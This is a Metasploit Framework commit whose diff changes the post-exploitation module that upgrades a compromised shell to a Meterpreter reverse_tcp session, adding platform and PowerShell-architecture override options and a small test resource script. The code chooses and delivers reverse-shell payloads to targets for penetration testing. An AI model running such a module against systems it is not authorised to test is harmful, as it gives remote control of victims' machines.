Enhance ability to follow payload override in shell to meterpreter

Update modules/post/multi/manage/shell_to_meterpreter.rb Co-authored-by: jheysel-r7 <[email protected]> payload override
rapid7 · Nov 6, 2023 · 021e4cc · 021e4cc
1 parent 30e1930
commit 021e4cc
Show file tree

Hide file tree

Showing 2 changed files with 82 additions and 43 deletions.
diff --git a/foo.rc b/foo.rc
@@ -0,0 +1,4 @@
+<ruby>
+puts run_single("load powershell")
+puts run_single("powershell_execute 'sleep 20; echo abc'")
+</ruby>
diff --git a/modules/post/multi/manage/shell_to_meterpreter.rb b/modules/post/multi/manage/shell_to_meterpreter.rb
@@ -43,6 +43,10 @@ def initialize(info = {})
                   [true, 'Which method to try first to transfer files on a Windows target.', 'POWERSHELL', ['POWERSHELL', 'VBS']]),
       OptString.new('PAYLOAD_OVERRIDE',
                     [false, 'Define the payload to use (meterpreter/reverse_tcp by default) .', nil]),
+      OptString.new('PLATFORM_OVERRIDE',
+                    [false, 'Define the platform to use.', nil]),
+      OptString.new('PSH_ARCH_OVERRIDE',
+                    [false, 'Define the powershell architecture to use', nil]),
       OptString.new('BOURNE_PATH',
                     [false, 'Remote path to drop binary']),
       OptString.new('BOURNE_FILE',
@@ -52,7 +56,8 @@ def initialize(info = {})
     ])
     deregister_options('PERSIST', 'PSH_OLD_METHOD', 'RUN_WOW64')
   end
-
+  VALID_PSH_ARCH_OVERRIDE = ['x64', 'x86']
+  VALID_PLATFORM_OVERRIDE = ['windows', 'win', 'osx', 'solaris', 'python', 'linux', 'netware', 'android', 'java', 'r', 'ruby', 'cisco', 'juniper', 'unifi', 'brocade', 'mikrotik', 'artista', 'bsd', 'aix', 'hpux', 'irix', 'unix', 'php', 'js', 'firefox', 'nodejs', 'mainframe', 'multi', 'hardware', 'apple_ios']
   def command_timeout
     datastore['COMMAND_TIMEOUT']
   end
@@ -81,55 +86,87 @@ def run
     lport = datastore['LPORT']
 
     # Handle platform specific variables and settings
-    case session.platform
-    when 'windows', 'win'
-      platform = 'windows'
-      lplat = [Msf::Platform::Windows]
-      arch = get_os_architecture
-      case arch
-      when ARCH_X64
-        payload_name = 'windows/x64/meterpreter/reverse_tcp'
-        psh_arch = 'x64'
-      when ARCH_X86
-        payload_name = 'windows/meterpreter/reverse_tcp'
-        psh_arch = 'x86'
-      else
-        print_error('Target is running Windows on an unsupported architecture such as Windows ARM!')
+    if datastore['PAYLOAD_OVERRIDE']
+      unless datastore['PLATFORM_OVERRIDE']
+        print_error('Please pair PAYLOAD_OVERRIDE with a PLATFORM_OVERRIDE.')
         return nil
       end
-      larch = [arch]
-      vprint_status('Platform: Windows')
-    when 'osx'
-      platform = 'osx'
-      payload_name = 'osx/x64/meterpreter/reverse_tcp'
-      lplat = [Msf::Platform::OSX]
-      larch = [ARCH_X64]
-      vprint_status('Platform: OS X')
-    when 'solaris'
-      platform = 'python'
-      payload_name = 'python/meterpreter/reverse_tcp'
-      vprint_status('Platform: Solaris')
+      unless datastore['PLATFORM_OVERRIDE'].in? VALID_PLATFORM_OVERRIDE
+        print_error('Please provide a valid PLATFORM_OVERRIDE')
+        return nil
+      end
+      payload_name = datastore['PAYLOAD_OVERRIDE']
+      payload_info = payload_name.split('/')
+      payload = framework.payloads.create(payload_name)
+      platform = datastore['PLATFORM_OVERRIDE']
+      unless payload
+        print_error('Please provide a valid payload for PAYLOAD_OVERRIDE.')
+        return nil
+      end
+      if platform.downcase == 'windows' || platform.downcase == 'win'
+        unless datastore['PSH_ARCH_OVERRIDE']
+          print_error('Please provide a PSH_ARCH_OVERRIDE')
+          return nil
+        end
+        unless datastore['PSH_ARCH_OVERRIDE'].in? VALID_PSH_ARCH_OVERRIDE
+          print_error('Please provide a valid PSH_ARCH_OVERRIDE')
+          return nil
+        end
+        psh_arch = datastore['PSH_ARCH_OVERRIDE']
+      end
+      lplat = payload.platform.platforms
+      larch = payload.arch
     else
-      # Find the best fit, be specific with uname to avoid matching hostname or something else
-      target_info = cmd_exec('uname -ms')
-      if target_info =~ /linux/i && target_info =~ /86/
-        # Handle linux shells that were identified as 'unix'
-        platform = 'linux'
-        payload_name = 'linux/x86/meterpreter/reverse_tcp'
-        lplat = [Msf::Platform::Linux]
-        larch = [ARCH_X86]
-        vprint_status('Platform: Linux')
-      elsif target_info =~ /darwin/i
+      case session.platform
+      when 'windows', 'win'
+        platform = 'windows'
+        lplat = [Msf::Platform::Windows]
+        arch = get_os_architecture
+        case arch
+        when ARCH_X64
+          payload_name = 'windows/x64/meterpreter/reverse_tcp'
+          psh_arch = 'x64'
+        when ARCH_X86
+          payload_name = 'windows/meterpreter/reverse_tcp'
+          psh_arch = 'x86'
+        else
+          print_error('Target is running Windows on an unsupported architecture such as Windows ARM!')
+          return nil
+        end
+        larch = [arch]
+        vprint_status('Platform: Windows')
+      when 'osx'
         platform = 'osx'
         payload_name = 'osx/x64/meterpreter/reverse_tcp'
         lplat = [Msf::Platform::OSX]
         larch = [ARCH_X64]
         vprint_status('Platform: OS X')
-      elsif remote_python_binary
-        # Generic fallback for OSX, Solaris, Linux/ARM
+      when 'solaris'
         platform = 'python'
         payload_name = 'python/meterpreter/reverse_tcp'
-        vprint_status('Platform: Python [fallback]')
+        vprint_status('Platform: Solaris')
+      else
+        # Find the best fit, be specific with uname to avoid matching hostname or something else
+        target_info = cmd_exec('uname -ms')
+        if target_info =~ /linux/i && target_info =~ /86/
+          # Handle linux shells that were identified as 'unix'
+          platform = 'linux'
+          payload_name = 'linux/x86/meterpreter/reverse_tcp'
+          lplat = [Msf::Platform::Linux]
+          larch = [ARCH_X86]
+          vprint_status('Platform: Linux')
+        elsif target_info =~ /darwin/i
+          platform = 'osx'
+          payload_name = 'osx/x64/meterpreter/reverse_tcp'
+          lplat = [Msf::Platform::OSX]
+          larch = [ARCH_X64]
+          vprint_status('Platform: OS X')
+        elsif remote_python_binary
+          # Generic fallback for OSX, Solaris, Linux/ARM
+          platform = 'python'
+          payload_name = 'python/meterpreter/reverse_tcp'
+          vprint_status('Platform: Python [fallback]')
+        end
       end
     end
 
@@ -138,8 +175,6 @@ def run
       return nil
     end
 
-    payload_name = datastore['PAYLOAD_OVERRIDE'] if datastore['PAYLOAD_OVERRIDE']
-
     vprint_status("Upgrade payload: #{payload_name}")
 
     payload_data = generate_payload(lhost, lport, payload_name)
@@ -156,7 +191,7 @@ def run
       end
     end
 
-    case platform
+    case platform.downcase
     when 'windows'
       if session.type == 'powershell'
         template_path = Rex::Powershell::Templates::TEMPLATE_DIR